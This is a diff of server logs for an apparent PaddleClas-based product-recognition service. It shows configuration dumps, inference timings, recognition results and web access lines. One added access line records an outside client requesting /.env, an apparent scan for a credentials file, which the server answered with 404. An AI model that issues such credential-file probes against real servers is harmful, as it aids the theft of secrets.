: -2021-11-03 04:39:50 INFO: batch_size : 1 -2021-11-03 04:39:50 INFO: cpu_num_threads : 10 -2021-11-03 04:39:50 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:39:50 INFO: enable_benchmark : True -2021-11-03 04:39:50 INFO: enable_mkldnn : True -2021-11-03 04:39:50 INFO: enable_profile : False -2021-11-03 04:39:50 INFO: gpu_mem : 8000 -2021-11-03 04:39:50 INFO: image_shape : [3, 640, 640] -2021-11-03 04:39:50 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:39:50 INFO: ir_optim : True -2021-11-03 04:39:50 INFO: labe_list : ['foreground'] -2021-11-03 04:39:50 INFO: max_det_results : 5 -2021-11-03 04:39:50 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:39:50 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:39:50 INFO: threshold : 0.2 -2021-11-03 04:39:50 INFO: use_fp16 : False -2021-11-03 04:39:50 INFO: use_gpu : False -2021-11-03 04:39:50 INFO: use_tensorrt : False -2021-11-03 04:39:50 INFO: IndexProcess : -2021-11-03 04:39:50 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:39:50 INFO: return_k : 5 -2021-11-03 04:39:50 INFO: score_thres : 0.5 -2021-11-03 04:39:50 INFO: RecPostProcess : None -2021-11-03 04:39:50 INFO: RecPreProcess : -2021-11-03 04:39:50 INFO: transform_ops : -2021-11-03 04:39:50 INFO: ResizeImage : -2021-11-03 04:39:50 INFO: size : 224 -2021-11-03 04:39:50 INFO: NormalizeImage : -2021-11-03 04:39:50 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:39:50 INFO: order : -2021-11-03 04:39:50 INFO: scale : 0.00392157 -2021-11-03 04:39:50 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:39:50 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2184.7615242004395 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891} +2022-02-14 08:24:44 INFO: DetPostProcess : +2022-02-14 08:24:44 INFO: DetPreProcess : +2022-02-14 08:24:44 INFO: transform_ops : +2022-02-14 08:24:44 INFO: DetResize : +2022-02-14 08:24:44 INFO: interp : 2 +2022-02-14 08:24:44 INFO: keep_ratio : False +2022-02-14 08:24:44 INFO: target_size : [640, 640] +2022-02-14 08:24:44 INFO: DetNormalizeImage : +2022-02-14 08:24:44 INFO: is_scale : True +2022-02-14 08:24:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:24:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:24:44 INFO: DetPermute : +2022-02-14 08:24:44 INFO: Global : +2022-02-14 08:24:44 INFO: batch_size : 1 +2022-02-14 08:24:44 INFO: cpu_num_threads : 1 +2022-02-14 08:24:44 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:24:44 INFO: enable_benchmark : True +2022-02-14 08:24:44 INFO: enable_mkldnn : True +2022-02-14 08:24:44 INFO: enable_profile : False +2022-02-14 08:24:44 INFO: gpu_mem : 8000 +2022-02-14 08:24:44 INFO: image_shape : [3, 640, 640] +2022-02-14 08:24:44 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:24:44 INFO: ir_optim : True +2022-02-14 08:24:44 INFO: labe_list : ['foreground'] +2022-02-14 08:24:44 INFO: max_det_results : 5 +2022-02-14 08:24:44 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:24:44 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:24:44 INFO: threshold : 0.2 +2022-02-14 08:24:44 INFO: use_fp16 : False +2022-02-14 08:24:44 INFO: use_gpu : False +2022-02-14 08:24:44 INFO: use_tensorrt : False +2022-02-14 08:24:44 INFO: IndexProcess : +2022-02-14 08:24:44 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:24:44 INFO: return_k : 5 +2022-02-14 08:24:44 INFO: score_thres : 0.5 +2022-02-14 08:24:44 INFO: RecPostProcess : None +2022-02-14 08:24:44 INFO: RecPreProcess : +2022-02-14 08:24:44 INFO: transform_ops : +2022-02-14 08:24:44 INFO: ResizeImage : +2022-02-14 08:24:44 INFO: size : 224 +2022-02-14 08:24:44 INFO: NormalizeImage : +2022-02-14 08:24:44 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:24:44 INFO: order : +2022-02-14 08:24:44 INFO: scale : 0.00392157 +2022-02-14 08:24:44 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:24:44 INFO: ToCHWImage : None +Inference: 373.57163429260254 ms per batch image +[] 234 -["{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.525891}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 16/29] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:39:48 2021] POST /reference_client/ => generated 114 bytes in 6046 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1135/1327] 223.167.141.7 () {34 vars in 449 bytes} [Mon Feb 14 08:24:43 2022] POST /reference_client/ => generated 98 bytes in 2988 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) +[pid: 19147|app: 0|req: 89/1328] 23.99.198.33 () {36 vars in 588 bytes} [Mon Feb 14 08:24:50 2022] GET /.env => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +[pid: 19145|app: 0|req: 17/1329] 23.99.198.33 () {40 vars in 695 bytes} [Mon Feb 14 08:24:51 2022] POST / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) req -2021-11-03 04:40:11 INFO: +2022-02-14 08:25:01 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2636,78 +4808,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:40:11 INFO: DetPostProcess : -2021-11-03 04:40:11 INFO: DetPreProcess : -2021-11-03 04:40:11 INFO: transform_ops : -2021-11-03 04:40:11 INFO: DetResize : -2021-11-03 04:40:11 INFO: interp : 2 -2021-11-03 04:40:11 INFO: keep_ratio : False -2021-11-03 04:40:11 INFO: target_size : [640, 640] -2021-11-03 04:40:11 INFO: DetNormalizeImage : -2021-11-03 04:40:11 INFO: is_scale : True -2021-11-03 04:40:11 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:40:11 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:40:11 INFO: DetPermute : -2021-11-03 04:40:11 INFO: Global : -2021-11-03 04:40:11 INFO: batch_size : 1 -2021-11-03 04:40:11 INFO: cpu_num_threads : 10 -2021-11-03 04:40:11 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:40:11 INFO: enable_benchmark : True -2021-11-03 04:40:11 INFO: enable_mkldnn : True -2021-11-03 04:40:11 INFO: enable_profile : False -2021-11-03 04:40:11 INFO: gpu_mem : 8000 -2021-11-03 04:40:11 INFO: image_shape : [3, 640, 640] -2021-11-03 04:40:11 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:40:11 INFO: ir_optim : True -2021-11-03 04:40:11 INFO: labe_list : ['foreground'] -2021-11-03 04:40:11 INFO: max_det_results : 5 -2021-11-03 04:40:11 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:40:11 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:40:11 INFO: threshold : 0.2 -2021-11-03 04:40:11 INFO: use_fp16 : False -2021-11-03 04:40:11 INFO: use_gpu : False -2021-11-03 04:40:11 INFO: use_tensorrt : False -2021-11-03 04:40:11 INFO: IndexProcess : -2021-11-03 04:40:11 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:40:11 INFO: return_k : 5 -2021-11-03 04:40:11 INFO: score_thres : 0.5 -2021-11-03 04:40:11 INFO: RecPostProcess : None -2021-11-03 04:40:11 INFO: RecPreProcess : -2021-11-03 04:40:11 INFO: transform_ops : -2021-11-03 04:40:11 INFO: ResizeImage : -2021-11-03 04:40:11 INFO: size : 224 -2021-11-03 04:40:11 INFO: NormalizeImage : -2021-11-03 04:40:11 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:40:11 INFO: order : -2021-11-03 04:40:11 INFO: scale : 0.00392157 -2021-11-03 04:40:11 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:40:11 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2640.110492706299 ms per batch image -[{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595}] -{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595} +2022-02-14 08:25:01 INFO: DetPostProcess : +2022-02-14 08:25:01 INFO: DetPreProcess : +2022-02-14 08:25:01 INFO: transform_ops : +2022-02-14 08:25:01 INFO: DetResize : +2022-02-14 08:25:01 INFO: interp : 2 +2022-02-14 08:25:01 INFO: keep_ratio : False +2022-02-14 08:25:01 INFO: target_size : [640, 640] +2022-02-14 08:25:01 INFO: DetNormalizeImage : +2022-02-14 08:25:01 INFO: is_scale : True +2022-02-14 08:25:01 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:25:01 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:25:01 INFO: DetPermute : +2022-02-14 08:25:01 INFO: Global : +2022-02-14 08:25:01 INFO: batch_size : 1 +2022-02-14 08:25:01 INFO: cpu_num_threads : 1 +2022-02-14 08:25:01 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:25:01 INFO: enable_benchmark : True +2022-02-14 08:25:01 INFO: enable_mkldnn : True +2022-02-14 08:25:01 INFO: enable_profile : False +2022-02-14 08:25:01 INFO: gpu_mem : 8000 +2022-02-14 08:25:01 INFO: image_shape : [3, 640, 640] +2022-02-14 08:25:01 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:25:01 INFO: ir_optim : True +2022-02-14 08:25:01 INFO: labe_list : ['foreground'] +2022-02-14 08:25:01 INFO: max_det_results : 5 +2022-02-14 08:25:01 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:25:01 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:25:01 INFO: threshold : 0.2 +2022-02-14 08:25:01 INFO: use_fp16 : False +2022-02-14 08:25:01 INFO: use_gpu : False +2022-02-14 08:25:01 INFO: use_tensorrt : False +2022-02-14 08:25:01 INFO: IndexProcess : +2022-02-14 08:25:01 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:25:01 INFO: return_k : 5 +2022-02-14 08:25:01 INFO: score_thres : 0.5 +2022-02-14 08:25:01 INFO: RecPostProcess : None +2022-02-14 08:25:01 INFO: RecPreProcess : +2022-02-14 08:25:01 INFO: transform_ops : +2022-02-14 08:25:01 INFO: ResizeImage : +2022-02-14 08:25:01 INFO: size : 224 +2022-02-14 08:25:01 INFO: NormalizeImage : +2022-02-14 08:25:01 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:25:01 INFO: order : +2022-02-14 08:25:01 INFO: scale : 0.00392157 +2022-02-14 08:25:01 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:25:01 INFO: ToCHWImage : None +Inference: 374.43017959594727 ms per batch image +[] 234 -["{'bbox': [11, 57, 505, 479], 'rec_docs': '江小白', 'rec_scores': 0.6217595}\n"] -['江小白'] -['江小白', '30'] -[pid: 32766|app: 0|req: 12/30] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:40:09 2021] POST /reference_client/ => generated 114 bytes in 6615 msecs (HTTP/1.1 200) 5 headers in 158 bytes (11 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1136/1330] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:25:00 2022] POST /reference_client/ => generated 98 bytes in 2930 msecs (HTTP/1.1 200) 5 headers in 157 bytes (22 switches on core 0) req -2021-11-03 04:42:51 INFO: +2022-02-14 08:52:13 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2717,81 +4870,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:42:51 INFO: DetPostProcess : -2021-11-03 04:42:51 INFO: DetPreProcess : -2021-11-03 04:42:51 INFO: transform_ops : -2021-11-03 04:42:51 INFO: DetResize : -2021-11-03 04:42:51 INFO: interp : 2 -2021-11-03 04:42:51 INFO: keep_ratio : False -2021-11-03 04:42:51 INFO: target_size : [640, 640] -2021-11-03 04:42:51 INFO: DetNormalizeImage : -2021-11-03 04:42:51 INFO: is_scale : True -2021-11-03 04:42:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:42:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:42:51 INFO: DetPermute : -2021-11-03 04:42:51 INFO: Global : -2021-11-03 04:42:51 INFO: batch_size : 1 -2021-11-03 04:42:51 INFO: cpu_num_threads : 10 -2021-11-03 04:42:51 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:42:51 INFO: enable_benchmark : True -2021-11-03 04:42:51 INFO: enable_mkldnn : True -2021-11-03 04:42:51 INFO: enable_profile : False -2021-11-03 04:42:51 INFO: gpu_mem : 8000 -2021-11-03 04:42:51 INFO: image_shape : [3, 640, 640] -2021-11-03 04:42:51 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:42:51 INFO: ir_optim : True -2021-11-03 04:42:51 INFO: labe_list : ['foreground'] -2021-11-03 04:42:51 INFO: max_det_results : 5 -2021-11-03 04:42:51 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:42:51 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:42:51 INFO: threshold : 0.2 -2021-11-03 04:42:51 INFO: use_fp16 : False -2021-11-03 04:42:51 INFO: use_gpu : False -2021-11-03 04:42:51 INFO: use_tensorrt : False -2021-11-03 04:42:51 INFO: IndexProcess : -2021-11-03 04:42:51 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:42:51 INFO: return_k : 5 -2021-11-03 04:42:51 INFO: score_thres : 0.5 -2021-11-03 04:42:51 INFO: RecPostProcess : None -2021-11-03 04:42:51 INFO: RecPreProcess : -2021-11-03 04:42:51 INFO: transform_ops : -2021-11-03 04:42:51 INFO: ResizeImage : -2021-11-03 04:42:51 INFO: size : 224 -2021-11-03 04:42:51 INFO: NormalizeImage : -2021-11-03 04:42:51 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:42:51 INFO: order : -2021-11-03 04:42:51 INFO: scale : 0.00392157 -2021-11-03 04:42:51 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:42:51 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2293.3998107910156 ms per batch image -[{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244}] -{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244} +2022-02-14 08:52:13 INFO: DetPostProcess : +2022-02-14 08:52:13 INFO: DetPreProcess : +2022-02-14 08:52:13 INFO: transform_ops : +2022-02-14 08:52:13 INFO: DetResize : +2022-02-14 08:52:13 INFO: interp : 2 +2022-02-14 08:52:13 INFO: keep_ratio : False +2022-02-14 08:52:13 INFO: target_size : [640, 640] +2022-02-14 08:52:13 INFO: DetNormalizeImage : +2022-02-14 08:52:13 INFO: is_scale : True +2022-02-14 08:52:13 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:13 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:13 INFO: DetPermute : +2022-02-14 08:52:13 INFO: Global : +2022-02-14 08:52:13 INFO: batch_size : 1 +2022-02-14 08:52:13 INFO: cpu_num_threads : 1 +2022-02-14 08:52:13 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:13 INFO: enable_benchmark : True +2022-02-14 08:52:13 INFO: enable_mkldnn : True +2022-02-14 08:52:13 INFO: enable_profile : False +2022-02-14 08:52:13 INFO: gpu_mem : 8000 +2022-02-14 08:52:13 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:13 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:13 INFO: ir_optim : True +2022-02-14 08:52:13 INFO: labe_list : ['foreground'] +2022-02-14 08:52:13 INFO: max_det_results : 5 +2022-02-14 08:52:13 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:13 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:13 INFO: threshold : 0.2 +2022-02-14 08:52:13 INFO: use_fp16 : False +2022-02-14 08:52:13 INFO: use_gpu : False +2022-02-14 08:52:13 INFO: use_tensorrt : False +2022-02-14 08:52:13 INFO: IndexProcess : +2022-02-14 08:52:13 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:13 INFO: return_k : 5 +2022-02-14 08:52:13 INFO: score_thres : 0.5 +2022-02-14 08:52:13 INFO: RecPostProcess : None +2022-02-14 08:52:13 INFO: RecPreProcess : +2022-02-14 08:52:13 INFO: transform_ops : +2022-02-14 08:52:13 INFO: ResizeImage : +2022-02-14 08:52:13 INFO: size : 224 +2022-02-14 08:52:13 INFO: NormalizeImage : +2022-02-14 08:52:13 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:13 INFO: order : +2022-02-14 08:52:13 INFO: scale : 0.00392157 +2022-02-14 08:52:13 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:13 INFO: ToCHWImage : None +Inference: 381.20031356811523 ms per batch image +[] 234 -["{'bbox': [5, 0, 631, 479], 'rec_docs': '江小白', 'rec_scores': 0.58137244}\n"] -['江小白'] -['江小白', '30'] -[pid: 32765|app: 0|req: 17/31] 210.51.42.176 () {34 vars in 432 bytes} [Wed Nov 3 04:42:50 2021] POST /reference_client/ => generated 114 bytes in 6117 msecs (HTTP/1.1 200) 5 headers in 158 bytes (9 switches on core 0) -[pid: 32765|app: 0|req: 18/32] 205.185.120.103 () {40 vars in 569 bytes} [Wed Nov 3 04:46:36 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32765|app: 0|req: 19/33] 106.12.223.203 () {36 vars in 488 bytes} [Wed Nov 3 04:50:22 2021] GET / => generated 179 bytes in 2 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) -[pid: 32766|app: 0|req: 13/34] 106.12.223.200 () {36 vars in 488 bytes} [Wed Nov 3 04:50:24 2021] GET / => generated 179 bytes in 1 msecs (HTTP/1.1 404) 5 headers in 158 bytes (1 switches on core 0) +["Please connect root to upload container's name and it's price!\n"] +[pid: 19148|app: 0|req: 1137/1331] 223.167.141.7 () {34 vars in 448 bytes} [Mon Feb 14 08:52:12 2022] POST /reference_client/ => generated 98 bytes in 3053 msecs (HTTP/1.1 200) 5 headers in 157 bytes (23 switches on core 0) req -2021-11-03 04:59:10 INFO: +2022-02-14 08:52:28 INFO: =========================================================== == PaddleClas is powered by PaddlePaddle ! == =========================================================== @@ -2801,78 +4932,59 @@ req == https://github.com/PaddlePaddle/PaddleClas == =========================================================== -2021-11-03 04:59:10 INFO: DetPostProcess : -2021-11-03 04:59:10 INFO: DetPreProcess : -2021-11-03 04:59:10 INFO: transform_ops : -2021-11-03 04:59:10 INFO: DetResize : -2021-11-03 04:59:10 INFO: interp : 2 -2021-11-03 04:59:10 INFO: keep_ratio : False -2021-11-03 04:59:10 INFO: target_size : [640, 640] -2021-11-03 04:59:10 INFO: DetNormalizeImage : -2021-11-03 04:59:10 INFO: is_scale : True -2021-11-03 04:59:10 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:10 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:10 INFO: DetPermute : -2021-11-03 04:59:10 INFO: Global : -2021-11-03 04:59:10 INFO: batch_size : 1 -2021-11-03 04:59:10 INFO: cpu_num_threads : 10 -2021-11-03 04:59:10 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer -2021-11-03 04:59:10 INFO: enable_benchmark : True -2021-11-03 04:59:10 INFO: enable_mkldnn : True -2021-11-03 04:59:10 INFO: enable_profile : False -2021-11-03 04:59:10 INFO: gpu_mem : 8000 -2021-11-03 04:59:10 INFO: image_shape : [3, 640, 640] -2021-11-03 04:59:10 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg -2021-11-03 04:59:10 INFO: ir_optim : True -2021-11-03 04:59:10 INFO: labe_list : ['foreground'] -2021-11-03 04:59:10 INFO: max_det_results : 5 -2021-11-03 04:59:10 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer -2021-11-03 04:59:10 INFO: rec_nms_thresold : 0.05 -2021-11-03 04:59:10 INFO: threshold : 0.2 -2021-11-03 04:59:10 INFO: use_fp16 : False -2021-11-03 04:59:10 INFO: use_gpu : False -2021-11-03 04:59:10 INFO: use_tensorrt : False -2021-11-03 04:59:10 INFO: IndexProcess : -2021-11-03 04:59:10 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update -2021-11-03 04:59:10 INFO: return_k : 5 -2021-11-03 04:59:10 INFO: score_thres : 0.5 -2021-11-03 04:59:10 INFO: RecPostProcess : None -2021-11-03 04:59:10 INFO: RecPreProcess : -2021-11-03 04:59:10 INFO: transform_ops : -2021-11-03 04:59:10 INFO: ResizeImage : -2021-11-03 04:59:10 INFO: size : 224 -2021-11-03 04:59:10 INFO: NormalizeImage : -2021-11-03 04:59:10 INFO: mean : [0.485, 0.456, 0.406] -2021-11-03 04:59:10 INFO: order : -2021-11-03 04:59:10 INFO: scale : 0.00392157 -2021-11-03 04:59:10 INFO: std : [0.229, 0.224, 0.225] -2021-11-03 04:59:10 INFO: ToCHWImage : None ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation ---- Fused 0 subgraphs into layer_norm op. ---- fused 0 scale with matmul ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with transpose's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape ---- Fused 0 ReshapeTransposeMatmulMkldnn patterns with reshape's xshape with transpose's xshape ---- Fused 0 MatmulTransposeReshape patterns ---- fused 0 batch norm with relu activation -Inference: 2347.242832183838 ms per batch image -[{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545}] -{'bbox': [0, 0, 640, 480], 'rec_docs': '江小白', 'rec_scores': 0.6235545} +2022-02-14 08:52:28 INFO: DetPostProcess : +2022-02-14 08:52:28 INFO: DetPreProcess : +2022-02-14 08:52:28 INFO: transform_ops : +2022-02-14 08:52:28 INFO: DetResize : +2022-02-14 08:52:28 INFO: interp : 2 +2022-02-14 08:52:28 INFO: keep_ratio : False +2022-02-14 08:52:28 INFO: target_size : [640, 640] +2022-02-14 08:52:28 INFO: DetNormalizeImage : +2022-02-14 08:52:28 INFO: is_scale : True +2022-02-14 08:52:28 INFO: mean : [0.485, 0.456, 0.406] +2022-02-14 08:52:28 INFO: std : [0.229, 0.224, 0.225] +2022-02-14 08:52:28 INFO: DetPermute : +2022-02-14 08:52:28 INFO: Global : +2022-02-14 08:52:28 INFO: batch_size : 1 +2022-02-14 08:52:28 INFO: cpu_num_threads : 1 +2022-02-14 08:52:28 INFO: det_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/picodet_PPLCNet_x2_5_mainbody_lite_v1.0_infer +2022-02-14 08:52:28 INFO: enable_benchmark : True +2022-02-14 08:52:28 INFO: enable_mkldnn : True +2022-02-14 08:52:28 INFO: enable_profile : False +2022-02-14 08:52:28 INFO: gpu_mem : 8000 +2022-02-14 08:52:28 INFO: image_shape : [3, 640, 640] +2022-02-14 08:52:28 INFO: infer_imgs : /root/Smart_container/PaddleClas/dataset/test_pic/test_client.jpg +2022-02-14 08:52:28 INFO: ir_optim : True +2022-02-14 08:52:28 INFO: labe_list : ['foreground'] +2022-02-14 08:52:28 INFO: max_det_results : 5 +2022-02-14 08:52:28 INFO: rec_inference_model_dir : /root/Smart_container/PaddleClas/deploy/models/general_PPLCNet_x2_5_lite_v1.0_infer +2022-02-14 08:52:28 INFO: rec_nms_thresold : 0.05 +2022-02-14 08:52:28 INFO: threshold : 0.2 +2022-02-14 08:52:28 INFO: use_fp16 : False +2022-02-14 08:52:28 INFO: use_gpu : False +2022-02-14 08:52:28 INFO: use_tensorrt : False +2022-02-14 08:52:28 INFO: IndexProcess : +2022-02-14 08:52:28 INFO: index_dir : /root/Smart_container/PaddleClas/dataset/retail/index_update +2022-02-14 08:52:28 INFO: return_k : 5 +2022-02-14 08:52:28 INFO: score_thres : 0.5 +2022-02-14 08:52:28 INFO: RecPostProcess : None +2022-02-14 08:52:28 INFO: RecPreProcess : +2022-02-14 08:52:28 INFO: transform_ops : +2022-02-14 08:52:28 INFO: ResizeImage : +2022-02-14 08:52:28 INFO: size : 224 